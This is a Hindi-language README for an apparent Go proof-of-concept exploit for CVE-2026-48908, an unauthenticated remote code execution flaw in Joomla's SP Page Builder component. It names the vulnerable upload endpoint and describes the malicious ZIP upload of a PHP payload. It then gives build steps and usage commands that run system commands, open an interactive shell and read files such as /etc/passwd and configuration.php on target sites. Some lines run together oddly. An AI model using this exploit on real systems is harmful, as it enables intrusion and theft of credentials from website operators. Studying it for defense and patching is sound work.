CVE-2026-48908 - SP Page Builder Joomla अप्रमाणित RCE
CVE-2026-48908 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट, जो Joomla SP Page Builder घटक में बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) भेद्यता है।
CVE-2026-48908 एक गंभीर सुरक्षा भेद्यता है जो बिना प्रमाणीकरण वाले हमलावरों को SP Page Builder घटक में ZIP फ़ाइल निष्कर्षण के अनुचित हैंडलिंग के माध्यम से कमजोर Joomla इंस्टॉलेशन पर मनमाना कोड निष्पादित करने की अनुमति देती है।
index.php?option=com_sppagebuilder&task=asset.uploadCustomIconयह भेद्यता संपत्ति अपलोड कार्यक्षमता में मौजूद है जहां एप्लिकेशन आइकन संपत्तियों वाली ZIP फ़ाइलों का अनुचित रूप से सत्यापन और निष्कर्षण करता है। एक हमलावर PHP पेलोड के साथ एक दुर्भावनापूर्ण ZIP फ़ाइल तैयार कर सकता है जिसे वेब-सुलभ निर्देशिका में निकाला जाएगा, जिससे रिमोट कोड निष्पादन संभव होगा।
golang.org/x/term - सुरक्षित पासवर्ड इनपुट के लिए टर्मिनल उपयोगिताएँgit clone https://github.com/gagaltotal/CVE-2026-48908-SP-Page-Builder-Joomla
cd CVE-2026-48908-SP-Page-Builder-Joomla
go mod init CVE-2026-48908-SP-Page-Builder-Joomla
go mod download
or
go mod tidy
go build -o poc_tot poc_tot.go
संकलित बाइनरीज़ रिलीज़ अनुभाग में उपलब्ध हैं।


./poc_tot -target http://target-site.com -cmd "whoami"
./poc_tot -target http://target-site.com -shell
./poc_tot -target http://target-site.com -check
./poc_tot -target http://target-site.com -cleanup
./poc_tot -target http://target-site.com -cmd "id" -token "your_joomla_token"
-target string
कमजोर Joomla इंस्टॉलेशन का लक्ष्य URL (आवश्यक)
उदाहरण: http://target.com या https://target.com
-cmd string
लक्ष्य पर निष्पादित करने का सिस्टम कमांड
उदाहरण: "cat /etc/passwd"
-shell
लक्ष्य पर इंटरैक्टिव शेल लॉन्च करें (सफल शोषण आवश्यक)
-check
शोषण का प्रयास किए बिना जांचें कि लक्ष्य कमजोर है या नहीं
-cleanup
लक्ष्य से अपलोड किए गए शेल और आर्टिफैक्ट हटाएं
-token string
शोषण के लिए CSRF टोकन (वैकल्पिक, प्रदान न करने पर स्वतः पता लगाया जाता है)
टूल कई शोषण वैक्टर का समर्थन करता है:
./poc_tot -target http://vulnerable.local -check
./poc_tot -target http://vulnerable.local -cmd "ls -la /var/www/html"
./poc_tot -target http://vulnerable.local -cmd "cat configuration.php"
./poc_tot -target http://vulnerable.local -shell
# शेल में:
> id
> whoami
> pwd
./poc_tot -target http://vulnerable.local -cleanup
यदि आप SP Page Builder घटक के साथ Joomla चला रहे हैं:
यह सॉफ़्टवेयर केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। लेखक इस टूल के दुरुपयोग या इसके कारण होने वाली क्षति के लिए जिम्मेदारी स्वीकार नहीं करते हैं। उपयोगकर्ता किसी भी लक्ष्य सिस्टम पर इस टूल का उपयोग करने से पहले उचित प्राधिकरण सुनिश्चित करने के लिए जिम्मेदार हैं।
इस टूल का उपयोग करके, आप स्वीकार करते हैं कि:
यह टूल केवल रक्षात्मक सुरक्षा अनुसंधान और अधिकृत पैठ परीक्षण के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच कंप्यूटर फ्रॉड और एब्यूज एक्ट और अन्य न्यायक्षेत्रों में समान कानूनों का उल्लंघन करती है। सुरक्षा परीक्षण करने से पहले हमेशा लिखित रूप में उचित प्राधिकरण प्राप्त करें।
index.php?option=com_installer&view=manageसुरक्षा अनुसंधान योगदान का स्वागत है। कृपया:
GhostGTR666 (Gagaltotal666)
समस्याओं, प्रश्नों या योगदान के लिए:
यह प्रोजेक्ट सुरक्षा अनुसंधान उद्देश्यों के लिए यथावत प्रदान किया गया है। उपयोग से पहले सुरक्षा उपकरणों और पैठ परीक्षण के संबंध में स्थानीय कानूनों की समीक्षा करें।
अंतिम अद्यतन: 2026-06-24
अस्वीकरण: यह टूल केवल अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है।